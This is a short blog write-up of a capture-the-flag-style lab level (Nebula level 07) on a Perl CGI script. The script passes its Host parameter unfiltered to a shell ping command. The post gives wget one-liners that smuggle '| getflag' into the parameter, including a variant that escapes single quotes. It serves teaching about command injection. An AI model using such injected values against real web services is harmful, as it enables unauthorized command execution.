blog.ferling.eu by Benedikt Ferling


 

exploit-exercises.com/nebula -- Level 07

Problem

  1. Userinput is fully trusted!

This problem is similar to level02. Userinput is passed directly to a function, which executes the given code in a shell. As said in level02, there is no magic formula for sanitizing userinput or protecting the code from userinput!

Exploit

The account flag07 serves an http-server at port 7007 on the localhost. You can browse it using wget. The cgi-script uses the variable Host unfiltered. It assumes that it is a hostname. Of course one can put anything into it. Lets assume the following:

1
wget -O /tmp/flag07 'localhost:7007/index.cgi?Host=| getflag '

This will save the output of the script to the file /tmp/flag07. A look shows us, that we successfully executed getflag on a target account.

Lesson / How to fix

  1. Do not trust input that the user controlls!

As said in level02, the safe use of userinput depends havily on the features of the language one is using!.

Would single quotes like the following help?

1
2
3
...
  @output = `ping -c 3 '$host' 2>&1`;
...

NO. One is still able to execute arbitrary code:

1
2
exploit_url='localhost:7007/index.cgi?Host=%27| getflag >/tmp/flag07 %27 localhost'
wget -O /dev/null "$exploit_url" && cat /tmp/flag07

I know my limits and I’m not an expert in perl, thus I cannot give a possible fix to this problem. Just one advice: Read the manual!


other levels…

00 01 02 03 04 05 06 07 08 09
10 11 12 13 14 15 16 17 18 19